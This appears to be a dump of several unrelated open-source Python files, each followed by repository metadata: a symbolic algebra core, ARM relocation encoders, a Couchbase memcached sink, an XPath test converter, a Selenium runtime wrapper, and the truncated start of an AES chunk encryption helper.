exp.walk(_collect)
return rv
def _replace_one(expr, match, repl):
vals = WildResults()
if expr.match(match, vals):
expr = repl.substitute({wilds(w): vals[w] for w in vals})
if len(expr) > 1:
return expr[0](*[_replace_one(x, match, repl) for x in expr.args])
else:
return expr
def replace(expr, d, repeat=True):
while True:
old_expr = expr
for k in d:
expr = _replace_one(expr, k, d[k])
if old_expr == expr or not repeat:
return expr
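# Example (illustrative, assuming the match module unifies wilds as usual):
#   x = symbols('x')
#   a = wilds('a')
#   replace(x + 0, {a + 0: a})   # rewrites x + 0 -> x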
class _Symbolic(tuple):
def match(self, other, valuestore=None):
'''
matches against a pattern, use wilds() to generate wilds
Example:
a,b = wilds('a b')
    val = WildResults()
if exp.match(a(b + 4), val):
print val.a
print val.b
'''
import match
return match.match(self, other, valuestore)
def __hash__(self):
return hash(self.name)
def simplify(self):
import simplify
return simplify.simplify(self)
def walk(self, *fns):
if len(fns) > 1:
def _(exp):
for f in fns:
exp = f(exp)
return exp
return self.walk(_)
exp = self
fn = fns[0]
if len(exp) == 1:
oldexp = exp
exp = fn(exp)
while exp != oldexp:
oldexp = exp
exp = fn(exp)
else:
args = list(map(lambda x: x.walk(fn), exp.args))
oldexp = self
exp = fn(fn(exp[0])(*args))
#while exp != oldexp:
# print '%s => %s' % (oldexp, exp)
# oldexp = exp
# exp = exp.walk(fn)
if util.DEBUG and exp != self:
#print '%s => %s (%s)' % (self, exp, fn)
pass
return exp
def _dump(self):
return {
'name': self.name,
'id': id(self)
}
def __contains__(self, exp):
rv = {}
rv['val'] = False
def _(_exp):
if _exp.match(exp):
rv['val'] = True
return _exp
self.walk(_)
return rv['val']
def substitute(self, subs):
'''
takes a dictionary of substitutions
returns itself with substitutions made
'''
if self in subs:
self = subs[self]
return self
def compile(self, *arguments):
'''compiles a symbolic expression with arguments to a python function'''
def _compiled_func(*args):
assert len(args) == len(arguments)
argdic = {}
for i in range(len(args)):
argdic[arguments[i]] = args[i]
rv = self.substitute(argdic).simplify()
return desymbolic(rv)
return _compiled_func
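  # Example (illustrative, assuming simplify folds constants):
  #   x, y = symbols('x y')
  #   f = (x * x + y).compile(x, y)
  #   f(2, 3)   # -> 7.0, via substitute + simplify + desymbolic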
def __eq__(self, other):
#return type(self) == type(other) and self.name == other.name
return id(self) == id(other)
def __ne__(self, other):
return not self.__eq__(other)
def __getitem__(self, num):
if num == 0:
return self
raise BaseException("Invalid index")
def __len__(self):
return 1
# comparison operations notice we don't override __eq__
def __gt__(self, obj):
return Fn.GreaterThan(self, obj)
def __ge__(self, obj):
return Fn.GreaterThanEq(self, obj)
def __lt__(self, obj):
return Fn.LessThan(self, obj)
def __le__(self, obj):
return Fn.LessThanEq(self, obj)
# arithmetic overrides
def __mul__(self, other):
return Fn.Mul(self, other)
def __pow__(self, other):
return Fn.Pow(self, other)
def __rpow__(self, other):
return Fn.Pow(other, self)
def __div__(self, other):
return Fn.Div(self, other)
def __add__(self, other):
return Fn.Add(self, other)
def __sub__(self, other):
return Fn.Sub(self, other)
def __or__(self, other):
return Fn.BitOr(self, other)
def __and__(self, other):
return Fn.BitAnd(self, other)
def __xor__(self, other):
return Fn.BitXor(self, other)
def __rmul__(self, other):
return Fn.Mul(other, self)
def __rdiv__(self, other):
return Fn.Div(other, self)
def __radd__(self, other):
return Fn.Add(other, self)
def __rsub__(self, other):
return Fn.Sub(other, self)
def __ror__(self, other):
return Fn.BitOr(other, self)
def __rand__(self, other):
return Fn.BitAnd(other, self)
def __rxor__(self, other):
return Fn.BitXor(other, self)
def __rshift__(self, other):
return Fn.RShift(self, other)
def __lshift__(self, other):
return Fn.LShift(self, other)
def __rrshift__(self, other):
return Fn.RShift(other, self)
def __rlshift__(self, other):
return Fn.LShift(other, self)
def __neg__(self):
return self * -1
class _KnownValue(_Symbolic):
def value(self):
raise BaseException('not implemented')
class Boolean(_KnownValue):
@Memoize
def __new__(typ, b):
self = _KnownValue.__new__(typ)
self.name = str(b)
self.boolean = b
return self
def value(self):
return bool(self.boolean)
def __str__(self):
return str(self.boolean)
def __repr__(self):
return str(self)
def __eq__(self, other):
if isinstance(other, Boolean):
return bool(self.boolean) == bool(other.boolean)
elif isinstance(other, _Symbolic):
return other.__eq__(self)
else:
return bool(self.boolean) == other
class Number(_KnownValue):
IFORMAT = str
FFORMAT = str
@Memoize
def __new__(typ, n):
n = float(n)
self = _KnownValue.__new__(typ)
self.name = str(n)
self.n = n
return self
@property
def is_integer(self):
return self.n.is_integer()
def value(self):
return self.n
def __eq__(self, other):
if isinstance(other, Number):
return self.n == other.n
elif isinstance(other, _Symbolic):
return other.__eq__(self)
else:
return self.n == other
def __ne__(self, other):
if isinstance(other, _Symbolic):
return super(Number, self).__ne__(other)
else:
return self.n != other
def __str__(self):
if self.n.is_integer():
return Number.IFORMAT(int(self.n))
else:
return Number.FFORMAT(self.n)
def __repr__(self):
return str(self)
class WildResults(object):
def __init__(self):
self._hash = {}
def clear(self):
self._hash.clear()
def __setitem__(self, idx, val):
self._hash.__setitem__(idx, val)
def __contains__(self, idx):
return idx in self._hash
def __getitem__(self, idx):
return self._hash[idx]
def __getattr__(self, idx):
return self[idx]
def __iter__(self):
return self._hash.__iter__()
def __str__(self):
return str(self._hash)
def __repr__(self):
return str(self)
def __len__(self):
return len(self._hash)
class Wild(_Symbolic):
'''
wilds will be equal to anything, and are used for pattern matching
'''
@Memoize
def __new__(typ, name, **kargs):
self = _Symbolic.__new__(typ)
self.name = name
self.kargs = kargs
return self
def __str__(self):
return self.name
def __repr__(self):
return str(self)
def __call__(self, *args):
return Fn(self, *args)
def _dump(self):
return {
'type': type(self),
'name': self.name,
'kargs': self.kargs,
'id': id(self)
}
class Symbol(_Symbolic):
'''
symbols with the same name and kargs will be equal
(and in fact are guaranteed to be the same instance)
'''
@Memoize
def __new__(typ, name, **kargs):
self = Wild.__new__(typ, name)
self.name = name
self.kargs = kargs
self.is_integer = False # set to true to force domain to integers
self.is_bitvector = 0 # set to the size of the bitvector if it is a bitvector
self.is_bool = False # set to true if the symbol represents a boolean value
return self
def __str__(self):
return self.name
def __repr__(self):
return str(self)
def __call__(self, *args):
return Fn(self, *args)
def _dump(self):
return {
'type': type(self),
'name': self.name,
'kargs': self.kargs,
'id': id(self)
}
class Fn(_Symbolic):
@Memoize
def __new__(typ, fn, *args):
'''
arguments: Function, *arguments, **kargs
valid keyword args:
commutative (default False) - order of operands is unimportant
'''
if None in args:
raise BaseException('NONE IN ARGS %s %s' % (fn, args))
if not isinstance(fn, _Symbolic):
fn = symbolic(fn)
return Fn.__new__(typ, fn, *args)
for i in args:
if not isinstance(i, _Symbolic):
args = list(map(symbolic, args))
return Fn.__new__(typ, fn, *args)
self = _Symbolic.__new__(typ)
kargs = fn.kargs
self.kargs = fn.kargs
self.name = fn.name
self.fn = fn
self.args = args
#import simplify
#rv = simplify.simplify(self)
return self
def _dump(self):
return {
'id': id(self),
'name': self.name,
'fn': self.fn._dump(),
'kargs': self.kargs,
      'args': list(map(lambda x: x._dump(), self.args))
}
def __call__(self, *args):
return Fn(self, *args)
def substitute(self, subs):
args = list(map(lambda x: x.substitute(subs), self.args))
newfn = self.fn.substitute(subs)
self = Fn(newfn, *args)
if self in subs:
self = subs[self]
return self
def recursive_substitute(self, subs):
y = self
while True:
x = y.substitute(subs)
if x == y:
return x
y = x
def __getitem__(self, n):
if n == 0:
return self.fn
return self.args[n - 1]
def __len__(self):
return len(self.args) + 1
def _get_assoc_arguments(self):
import simplify
rv = []
args = list(self.args)
def _(a, b):
if (isinstance(a, Fn) and a.fn == self.fn) and not (isinstance(b, Fn) and b.fn == self.fn):
return -1
if (isinstance(b, Fn) and b.fn == self.fn) and not (isinstance(a, Fn) and a.fn == self.fn):
return 1
return simplify._order(a, b)
args.sort(_)
for i in args:
if isinstance(i, Fn) and i.fn == self.fn:
for j in i._get_assoc_arguments():
rv.append(j)
else:
rv.append(i)
return rv
@staticmethod
def LessThan(lhs, rhs):
return Fn(stdops.LessThan, lhs, rhs)
@staticmethod
def GreaterThan(lhs, rhs):
return Fn(stdops.GreaterThan, lhs, rhs)
@staticmethod
def LessThanEq(lhs, rhs):
return Fn(stdops.LessThanEq, lhs, rhs)
@staticmethod
def GreaterThanEq(lhs, rhs):
return Fn(stdops.GreaterThanEq, lhs, rhs)
@staticmethod
def Add(lhs, rhs):
return Fn(stdops.Add, lhs, rhs)
@staticmethod
def Sub(lhs, rhs):
return Fn(stdops.Sub, lhs, rhs)
@staticmethod
def Div(lhs, rhs):
return Fn(stdops.Div, lhs, rhs)
@staticmethod
def Mul(lhs, rhs):
return Fn(stdops.Mul, lhs, rhs)
@staticmethod
def Pow(lhs, rhs):
return Fn(stdops.Pow, lhs, rhs)
@staticmethod
def RShift(lhs, rhs):
return Fn(stdops.RShift, lhs, rhs)
@staticmethod
def LShift(lhs, rhs):
return Fn(stdops.LShift, lhs, rhs)
@staticmethod
def BitAnd(lhs, rhs):
return Fn(stdops.BitAnd, lhs, rhs)
@staticmethod
def BitOr(lhs, rhs):
return Fn(stdops.BitOr, lhs, rhs)
@staticmethod
def BitXor(lhs, rhs):
return Fn(stdops.BitXor, lhs, rhs)
def __str__(self):
if isinstance(self.fn, Symbol) and not self.name[0].isalnum() and len(self.args) == 2:
return '(%s %s %s)' % (self.args[0], self.name, self.args[1])
return '%s(%s)' % (self.fn, ','.join(map(str, self.args)))
def __repr__(self):
return str(self)
def symbols(symstr=None, **kargs):
'''
  takes a string of symbol names separated by whitespace;
  returns a single Symbol for one name, or a tuple of Symbols otherwise
'''
  if symstr is None:
syms = [''.join(random.choice(string.ascii_lowercase) for x in range(12))]
else:
syms = symstr.split(' ')
if len(syms) == 1:
return Symbol(syms[0], **kargs)
rv = []
for i in syms:
rv.append(Symbol(i, **kargs))
return tuple(rv)
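# Hedged usage sketch (assumes Symbol and Fn behave as defined above; how an
# expression prints depends on the operator names defined in stdops):
#
#   x, y = symbols('x y')   # two named symbols
#   z = symbols()           # one symbol with a random 12-letter name
#   expr = Fn.Add(x, y)     # the symbolic expression x + y
#   print expr              # rendered via Fn.__str__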
def wilds(symstr, **kargs):
'''
wilds should match anything
'''
syms = symstr.split(' ')
if len(syms) == 1:
return Wild(syms[0], **kargs)
rv = []
for i in syms:
rv.append(Wild(i, **kargs))
return tuple(rv)
def wild(name=None, **kargs):
  if name is None:
name = ''.join(random.choice(string.ascii_lowercase) for x in range(12))
return Wild(name, **kargs)
def symbolic(obj, **kargs):
'''
makes the symbolic version of an object
'''
if type(obj) in [type(0), type(0.0), type(0L), numpy.int32]:
return Number(obj, **kargs)
elif type(obj) == type('str'):
return Symbol(obj, **kargs)
elif type(obj) == type(True):
return Boolean(obj, **kargs)
elif isinstance(obj, _Symbolic):
return obj
else:
msg = "Unknown type (%s) %s passed to symbolic" % (type(obj), obj)
    raise TypeError(msg)
def desymbolic(s):
'''
returns a numeric version of s
'''
if type(s) in (int,long,float):
return s
s = s.simplify()
if not isinstance(s, Number):
raise BaseException("Only numbers can be passed to desymbolic")
return s.value()
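# Hedged round-trip sketch (relies only on the definitions above; the names
# are illustrative):
#
#   n = symbolic(42)              # wraps an int in a Number
#   assert desymbolic(n) == 42    # simplify() + value() recovers the int
#   desymbolic(symbols('x'))      # raises: a bare Symbol is not a Number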
import stdops
| bniemczyk/symbolic | symath/core.py | Python | bsd-2-clause | 14,038 |
from ...utils.bitfun import encode_imm32, align, wrap_negative
from ..encoding import Relocation
from .isa import ArmToken, arm_isa
@arm_isa.register_relocation
class Rel8Relocation(Relocation):
name = "rel8"
token = ArmToken
field = "imm8"
def calc(self, sym_value, reloc_value):
assert sym_value % 2 == 0
offset = sym_value - (align(reloc_value, 2) + 4)
        assert offset in range(-256, 256, 2), str(offset)
return wrap_negative(offset >> 1, 8)
@arm_isa.register_relocation
class Imm24Relocation(Relocation):
name = "imm24"
token = ArmToken
field = "imm24"
def calc(self, sym_value, reloc_value):
assert sym_value % 4 == 0
assert reloc_value % 4 == 0
offset = sym_value - (reloc_value + 8)
return wrap_negative(offset >> 2, 24)
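# Worked example of the imm24 encoding above (a sketch, not library code):
# for an ARM B/BL instruction at address 0x1000 branching to a symbol at
# 0x2000, the pipeline-adjusted offset is 0x2000 - (0x1000 + 8) = 0xff8
# bytes, stored in the 24-bit field as 0xff8 >> 2 = 0x3fe words.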
@arm_isa.register_relocation
class LdrImm12Relocation(Relocation):
name = "ldr_imm12"
token = ArmToken
def apply(self, sym_value, data, reloc_value):
assert sym_value % 4 == 0
assert reloc_value % 4 == 0
offset = sym_value - (reloc_value + 8)
U = 1
if offset < 0:
offset = -offset
U = 0
assert offset < 4096, "{} < 4096 {} {}".format(offset, sym_value, data)
data[2] |= U << 7
data[1] |= (offset >> 8) & 0xF
data[0] = offset & 0xFF
return data
@arm_isa.register_relocation
class AdrImm12Relocation(Relocation):
name = "adr_imm12"
token = ArmToken
def apply(self, sym_value, data, reloc_value):
assert sym_value % 4 == 0
assert reloc_value % 4 == 0
offset = sym_value - (reloc_value + 8)
U = 2
if offset < 0:
offset = -offset
U = 1
assert offset < 4096
offset = encode_imm32(offset)
data[2] |= U << 6
data[1] |= (offset >> 8) & 0xF
data[0] = offset & 0xFF
return data
| windelbouwman/ppci-mirror | ppci/arch/arm/arm_relocations.py | Python | bsd-2-clause | 1,941 |
#!/usr/bin/env python
import logging
import socket
import struct
import time
import sys
import cb_bin_client
import couchbaseConstants
import pump
import cbsnappy as snappy
try:
import ctypes
except ImportError:
cb_path = '/opt/couchbase/lib/python'
while cb_path in sys.path:
sys.path.remove(cb_path)
try:
import ctypes
except ImportError:
sys.exit('error: could not import ctypes module')
else:
sys.path.insert(0, cb_path)
OP_MAP = {
'get': couchbaseConstants.CMD_GET,
'set': couchbaseConstants.CMD_SET,
'add': couchbaseConstants.CMD_ADD,
'delete': couchbaseConstants.CMD_DELETE,
}
OP_MAP_WITH_META = {
'get': couchbaseConstants.CMD_GET,
'set': couchbaseConstants.CMD_SET_WITH_META,
'add': couchbaseConstants.CMD_ADD_WITH_META,
'delete': couchbaseConstants.CMD_DELETE_WITH_META
}
class MCSink(pump.Sink):
"""Dumb client sink using binary memcached protocol.
Used when moxi or memcached is destination."""
def __init__(self, opts, spec, source_bucket, source_node,
source_map, sink_map, ctl, cur):
super(MCSink, self).__init__(opts, spec, source_bucket, source_node,
source_map, sink_map, ctl, cur)
self.op_map = OP_MAP
if opts.extra.get("try_xwm", 1):
self.op_map = OP_MAP_WITH_META
self.init_worker(MCSink.run)
self.uncompress = opts.extra.get("uncompress", 0)
def close(self):
self.push_next_batch(None, None)
@staticmethod
def check_base(opts, spec):
if getattr(opts, "destination_vbucket_state", "active") != "active":
return ("error: only --destination-vbucket-state=active" +
" is supported by this destination: %s") % (spec)
op = getattr(opts, "destination_operation", None)
        if op not in [None, 'set', 'add', 'get']:
return ("error: --destination-operation unsupported value: %s" +
"; use set, add, get") % (op)
# Skip immediate superclass Sink.check_base(),
# since MCSink can handle different destination operations.
return pump.EndPoint.check_base(opts, spec)
@staticmethod
def run(self):
"""Worker thread to asynchronously store batches into sink."""
mconns = {} # State kept across scatter_gather() calls.
backoff_cap = self.opts.extra.get("backoff_cap", 10)
while not self.ctl['stop']:
batch, future = self.pull_next_batch()
if not batch:
self.future_done(future, 0)
self.close_mconns(mconns)
return
backoff = 0.1 # Reset backoff after a good batch.
while batch: # Loop in case retry is required.
rv, batch, need_backoff = self.scatter_gather(mconns, batch)
if rv != 0:
self.future_done(future, rv)
self.close_mconns(mconns)
return
if batch:
self.cur["tot_sink_retry_batch"] = \
self.cur.get("tot_sink_retry_batch", 0) + 1
if need_backoff:
backoff = min(backoff * 2.0, backoff_cap)
logging.warn("backing off, secs: %s" % (backoff))
time.sleep(backoff)
self.future_done(future, 0)
self.close_mconns(mconns)
def close_mconns(self, mconns):
for k, conn in mconns.items():
self.add_stop_event(conn)
conn.close()
def scatter_gather(self, mconns, batch):
conn = mconns.get("conn")
if not conn:
rv, conn = self.connect()
            if rv != 0:
                return rv, None, None
mconns["conn"] = conn
# TODO: (1) MCSink - run() handle --data parameter.
# Scatter or send phase.
rv = self.send_msgs(conn, batch.msgs, self.operation())
if rv != 0:
return rv, None, None
# Gather or recv phase.
rv, retry, refresh = self.recv_msgs(conn, batch.msgs)
if refresh:
self.refresh_sink_map()
if retry:
return rv, batch, True
return rv, None, None
def send_msgs(self, conn, msgs, operation, vbucket_id=None):
m = []
msg_format_length = 0
for i, msg in enumerate(msgs):
if not msg_format_length:
msg_format_length = len(msg)
cmd, vbucket_id_msg, key, flg, exp, cas, meta, val = msg[:8]
seqno = dtype = nmeta = conf_res = 0
if msg_format_length > 8:
seqno, dtype, nmeta, conf_res = msg[8:]
if vbucket_id is not None:
vbucket_id_msg = vbucket_id
if self.skip(key, vbucket_id_msg):
continue
rv, cmd = self.translate_cmd(cmd, operation, meta)
if rv != 0:
return rv
if dtype > 2:
if self.uncompress and val:
try:
val = snappy.uncompress(val)
except Exception, err:
pass
if cmd == couchbaseConstants.CMD_GET:
val, flg, exp, cas = '', 0, 0, 0
if cmd == couchbaseConstants.CMD_NOOP:
key, val, flg, exp, cas = '', '', 0, 0, 0
if cmd in (couchbaseConstants.CMD_DELETE, couchbaseConstants.CMD_DELETE_WITH_META):
val = ''
rv, req = self.cmd_request(cmd, vbucket_id_msg, key, val,
ctypes.c_uint32(flg).value,
exp, cas, meta, i, dtype, nmeta,
conf_res)
if rv != 0:
return rv
self.append_req(m, req)
if m:
try:
                conn.s.sendall(''.join(m))
except socket.error, e:
return "error: conn.send() exception: %s" % (e)
return 0
def recv_msgs(self, conn, msgs, vbucket_id=None, verify_opaque=True):
refresh = False
retry = False
for i, msg in enumerate(msgs):
cmd, vbucket_id_msg, key, flg, exp, cas, meta, val = msg[:8]
if vbucket_id is not None:
vbucket_id_msg = vbucket_id
if self.skip(key, vbucket_id_msg):
continue
try:
r_cmd, r_status, r_ext, r_key, r_val, r_cas, r_opaque = \
self.read_conn(conn)
if verify_opaque and i != r_opaque:
return "error: opaque mismatch: %s %s" % (i, r_opaque), None, None
if r_status == couchbaseConstants.ERR_SUCCESS:
continue
elif r_status == couchbaseConstants.ERR_KEY_EEXISTS:
#logging.warn("item exists: %s, key: %s" %
# (self.spec, key))
continue
elif r_status == couchbaseConstants.ERR_KEY_ENOENT:
if (cmd != couchbaseConstants.CMD_TAP_DELETE and
cmd != couchbaseConstants.CMD_GET):
logging.warn("item not found: %s, key: %s" %
(self.spec, key))
continue
elif (r_status == couchbaseConstants.ERR_ETMPFAIL or
r_status == couchbaseConstants.ERR_EBUSY or
r_status == couchbaseConstants.ERR_ENOMEM):
retry = True # Retry the whole batch again next time.
continue # But, finish recv'ing current batch.
elif r_status == couchbaseConstants.ERR_NOT_MY_VBUCKET:
msg = ("received NOT_MY_VBUCKET;"
" perhaps the cluster is/was rebalancing;"
" vbucket_id: %s, key: %s, spec: %s, host:port: %s:%s"
% (vbucket_id_msg, key, self.spec,
conn.host, conn.port))
if self.opts.extra.get("nmv_retry", 1):
logging.warn("warning: " + msg)
refresh = True
retry = True
self.cur["tot_sink_not_my_vbucket"] = \
self.cur.get("tot_sink_not_my_vbucket", 0) + 1
else:
return "error: " + msg, None, None
elif r_status == couchbaseConstants.ERR_UNKNOWN_COMMAND:
if self.op_map == OP_MAP:
if not retry:
return "error: unknown command: %s" % (r_cmd), None, None
else:
if not retry:
logging.warn("destination does not take XXX-WITH-META"
" commands; will use META-less commands")
self.op_map = OP_MAP
retry = True
else:
return "error: MCSink MC error: " + str(r_status), None, None
except Exception, e:
logging.error("MCSink exception: %s", e)
return "error: MCSink exception: " + str(e), None, None
return 0, retry, refresh
def translate_cmd(self, cmd, op, meta):
if len(str(meta)) <= 0:
# The source gave no meta, so use regular commands.
self.op_map = OP_MAP
        if cmd in [couchbaseConstants.CMD_TAP_MUTATION, couchbaseConstants.CMD_DCP_MUTATION]:
m = self.op_map.get(op, None)
if m:
return 0, m
return "error: MCSink.translate_cmd, unsupported op: " + op, None
if cmd in [couchbaseConstants.CMD_TAP_DELETE, couchbaseConstants.CMD_DCP_DELETE]:
if op == 'get':
return 0, couchbaseConstants.CMD_NOOP
return 0, self.op_map['delete']
if cmd == couchbaseConstants.CMD_GET:
return 0, cmd
return "error: MCSink - unknown cmd: %s, op: %s" % (cmd, op), None
def append_req(self, m, req):
hdr, ext, key, val, extra_meta = req
m.append(hdr)
if ext:
m.append(ext)
if key:
m.append(str(key))
if val:
m.append(str(val))
if extra_meta:
m.append(extra_meta)
@staticmethod
def can_handle(opts, spec):
return (spec.startswith("memcached://") or
spec.startswith("memcached-binary://"))
@staticmethod
def check(opts, spec, source_map):
host, port, user, pswd, path = \
pump.parse_spec(opts, spec, int(getattr(opts, "port", 11211)))
        if opts.ssl:
            port = couchbaseConstants.SSL_PORT
rv, conn = MCSink.connect_mc(host, port, user, pswd)
if rv != 0:
return rv, None
conn.close()
return 0, None
def refresh_sink_map(self):
return 0
@staticmethod
def consume_design(opts, sink_spec, sink_map,
source_bucket, source_map, source_design):
if source_design:
logging.warn("warning: cannot restore bucket design"
" on a memached destination")
return 0
def consume_batch_async(self, batch):
return self.push_next_batch(batch, pump.SinkBatchFuture(self, batch))
def connect(self):
host, port, user, pswd, path = \
pump.parse_spec(self.opts, self.spec,
int(getattr(self.opts, "port", 11211)))
if self.opts.ssl:
port = couchbaseConstants.SSL_PORT
return MCSink.connect_mc(host, port, user, pswd)
@staticmethod
def connect_mc(host, port, user, pswd):
mc = cb_bin_client.MemcachedClient(host, int(port))
if user:
try:
mc.sasl_auth_cram_md5(str(user), str(pswd))
except cb_bin_client.MemcachedError:
try:
mc.sasl_auth_plain(str(user), str(pswd))
except EOFError:
return "error: SASL auth error: %s:%s, user: %s" % \
(host, port, user), None
except cb_bin_client.MemcachedError:
return "error: SASL auth failed: %s:%s, user: %s" % \
(host, port, user), None
except socket.error:
return "error: SASL auth exception: %s:%s, user: %s" % \
(host, port, user), None
except EOFError:
return "error: SASL auth error: %s:%s, user: %s" % \
(host, port, user), None
except socket.error:
return "error: SASL auth exception: %s:%s, user: %s" % \
(host, port, user), None
return 0, mc
def cmd_request(self, cmd, vbucket_id, key, val, flg, exp, cas, meta, opaque, dtype, nmeta, conf_res):
ext_meta = ''
if (cmd == couchbaseConstants.CMD_SET_WITH_META or
cmd == couchbaseConstants.CMD_ADD_WITH_META or
cmd == couchbaseConstants.CMD_DELETE_WITH_META):
if meta:
try:
ext = struct.pack(">IIQQ", flg, exp, int(str(meta)), cas)
except ValueError:
seq_no = str(meta)
if len(seq_no) > 8:
seq_no = seq_no[0:8]
if len(seq_no) < 8:
# The seq_no might be 32-bits from 2.0DP4, so pad with 0x00's.
seq_no = ('\x00\x00\x00\x00\x00\x00\x00\x00' + seq_no)[-8:]
check_seqno, = struct.unpack(">Q", seq_no)
if check_seqno:
ext = (struct.pack(">II", flg, exp) + seq_no +
struct.pack(">Q", cas))
else:
ext = struct.pack(">IIQQ", flg, exp, 1, cas)
else:
ext = struct.pack(">IIQQ", flg, exp, 1, cas)
            if conf_res:
                # Assumption: the length field describes the conflict
                # resolution value, packed below as a 2-byte big-endian 'H'.
                con_res_len = struct.calcsize(">H")
                extra_meta = struct.pack(">BBHH",
                                         couchbaseConstants.DCP_EXTRA_META_VERSION,
                                         couchbaseConstants.DCP_EXTRA_META_CONFLICT_RESOLUTION,
                                         con_res_len,
                                         conf_res)
ext += struct.pack(">H", len(extra_meta))
elif (cmd == couchbaseConstants.CMD_SET or
cmd == couchbaseConstants.CMD_ADD):
ext = struct.pack(couchbaseConstants.SET_PKT_FMT, flg, exp)
elif (cmd == couchbaseConstants.CMD_DELETE or
cmd == couchbaseConstants.CMD_GET or
cmd == couchbaseConstants.CMD_NOOP):
ext = ''
else:
return "error: MCSink - unknown cmd for request: " + str(cmd), None
hdr = self.cmd_header(cmd, vbucket_id, key, val, ext, 0, opaque, dtype)
return 0, (hdr, ext, key, val, ext_meta)
def cmd_header(self, cmd, vbucket_id, key, val, ext, cas, opaque,
dtype=0,
fmt=couchbaseConstants.REQ_PKT_FMT,
magic=couchbaseConstants.REQ_MAGIC_BYTE):
#MB-11902
dtype = 0
return struct.pack(fmt, magic, cmd,
len(key), len(ext), dtype, vbucket_id,
len(key) + len(ext) + len(val), opaque, cas)
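    # Hedged layout sketch: assuming REQ_PKT_FMT is the standard 24-byte
    # memcached binary request header ">BBHBBHIIQ", the fields are magic,
    # opcode, key length, extras length, data type, vbucket id, total body
    # length (extras + key + value), opaque, and CAS. For example:
    #
    #   struct.pack(">BBHBBHIIQ", 0x80, 0x01, 3, 8, 0, 0, 8 + 3 + 5, 0, 0)
    #
    # would describe a SET (opcode 0x01) with a 3-byte key, 8-byte extras
    # and a 5-byte value.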
def read_conn(self, conn):
ext = ''
key = ''
val = ''
buf, cmd, errcode, extlen, keylen, data, cas, opaque = \
self.recv_msg(conn.s, getattr(conn, 'buf', ''))
conn.buf = buf
if data:
ext = data[0:extlen]
key = data[extlen:extlen+keylen]
val = data[extlen+keylen:]
return cmd, errcode, ext, key, val, cas, opaque
def recv_msg(self, sock, buf):
pkt, buf = self.recv(sock, couchbaseConstants.MIN_RECV_PACKET, buf)
if not pkt:
raise EOFError()
magic, cmd, keylen, extlen, dtype, errcode, datalen, opaque, cas = \
struct.unpack(couchbaseConstants.RES_PKT_FMT, pkt)
if magic != couchbaseConstants.RES_MAGIC_BYTE:
raise Exception("unexpected recv_msg magic: " + str(magic))
data, buf = self.recv(sock, datalen, buf)
return buf, cmd, errcode, extlen, keylen, data, cas, opaque
def recv(self, skt, nbytes, buf):
while len(buf) < nbytes:
data = None
try:
data = skt.recv(max(nbytes - len(buf), 4096))
except socket.timeout:
logging.error("error: recv socket.timeout")
except Exception, e:
logging.error("error: recv exception: " + str(e))
if not data:
return None, ''
buf += data
return buf[:nbytes], buf[nbytes:]
| TOTVS/mdmpublic | couchbase-cli/lib/python/pump_mc.py | Python | bsd-2-clause | 17,056 |
import argparse
import os
import sys

from lxml import etree
def process_file(name):
tree = etree.parse(name)
xpath = tree.xpath("//xsl:when/@test",
namespaces={"xsl": "http://www.w3.org/1999/XSL/Transform"})
test_xml = tree.xpath("/xsl:stylesheet/xsl:template/xsl:if[@test='false()']",
namespaces={"xsl": "http://www.w3.org/1999/XSL/Transform"})
if not xpath:
print("couldn't find xpath in %s" % name)
sys.exit(1)
xpath = xpath[0]
    if not test_xml or len(test_xml[0]) != 1:
        print("test didn't have a single root element, %s" % name)
        print(test_xml)
        sys.exit(1)
return xpath, test_xml[0][0]
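# Hedged sketch of the input each test file is expected to contain, inferred
# from the two XPath queries above (not from the presto-testo sources):
#
#   <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
#     <xsl:template match="/">
#       <xsl:choose><xsl:when test="count(//x) = 1"/></xsl:choose>
#       <xsl:if test="false()"><root><x/></root></xsl:if>
#     </xsl:template>
#   </xsl:stylesheet>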
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Convert XPath tests.')
parser.add_argument('in_dir', metavar='IN', help='path to presto-testo XPath tests')
parser.add_argument('out_dir', metavar='OUT', default="new",
help='path to output new XPath tests')
args = parser.parse_args()
tests = etree.fromstring("<tests/>")
d = args.in_dir
files = os.listdir(d)
for f in files:
if f.endswith(".xml") and f != "ref.xml":
xpath, test_xml = process_file(os.path.join(d, f))
test = etree.Element("test")
tests.append(test)
test.append(etree.Element("xpath"))
test.append(etree.Element("tree"))
test[0].text = xpath
test[1].append(test_xml)
with open(os.path.join(args.out_dir, "tests.xml"), "wb") as fp:
wrapped = etree.ElementTree(tests)
wrapped.write(fp, encoding="ascii", pretty_print=True, exclusive=True)
| gsnedders/presto-testo-converters | convert_xpath.py | Python | bsd-2-clause | 1,711 |
""" Web runtime based on Selenium.
Selenium is a Python library to automate browsers.
"""
from .common import BaseRuntime
class SeleniumRuntime(BaseRuntime):
""" Runtime based on Selenium (http://www.seleniumhq.org/), a tool
to automate browsers, e.g. for testing. Requires the Python package
"selenium" to be installed.
"""
def _launch(self):
# Get url and browser type
url = self._kwargs['url']
type = self._kwargs.get('type', '')
self._driver = None
# Import here; selenium is an optional dependency
from selenium import webdriver
if type.lower() == 'firefox':
self._driver = webdriver.Firefox()
elif type.lower() == 'chrome':
self._driver = webdriver.Chrome()
elif type.lower() == 'ie':
self._driver = webdriver.Ie()
elif type:
classname = None
type2 = type[0].upper() + type[1:]
if hasattr(webdriver, type):
classname = type
elif hasattr(webdriver, type2):
classname = type2
if classname:
self._driver = getattr(webdriver, classname)()
else:
raise ValueError('Unknown Selenium browser type %r' % type)
else:
            raise ValueError('To use the Selenium runtime, specify a browser type.')
# Open page
self._driver.get(url)
def close(self):
if self._driver:
self._driver.close()
self._driver = None
@property
def driver(self):
""" The Selenium webdriver object. Use this to control the browser.
"""
return self._driver
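# Hedged usage sketch (assumes BaseRuntime stores its keyword arguments in
# self._kwargs and invokes _launch(), as the code above relies on):
#
#   rt = SeleniumRuntime(url='http://localhost:8080/', type='firefox')
#   rt.driver.get_screenshot_as_file('/tmp/shot.png')  # plain Selenium API
#   rt.close()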
| JohnLunzer/flexx | flexx/webruntime/selenium.py | Python | bsd-2-clause | 1,783 |
from Crypto.Cipher import AES
import struct
CHUNK_SIZE = 32768
def encrypt_chunk(f, aes):
chunk = f.read(CHUNK_SIZE)
realn = len(chunk)
if realn == 0:
return ''
if realn % 16 != 0:
padding = 16 - (realn % 16)
chunk += ' ' * padding
head = struct.pack('!H', realn)
return head + aes.encrypt(chunk)
def decrypt_chunk(f, aes):
headn = struct.calcsize('!H')
head = f.read(headn)
if len(head) == 0:
return ''
realn, = struct.unpack('!H', head)
if realn % 16 != 0:
n = realn + (16 - (realn % 16))
else:
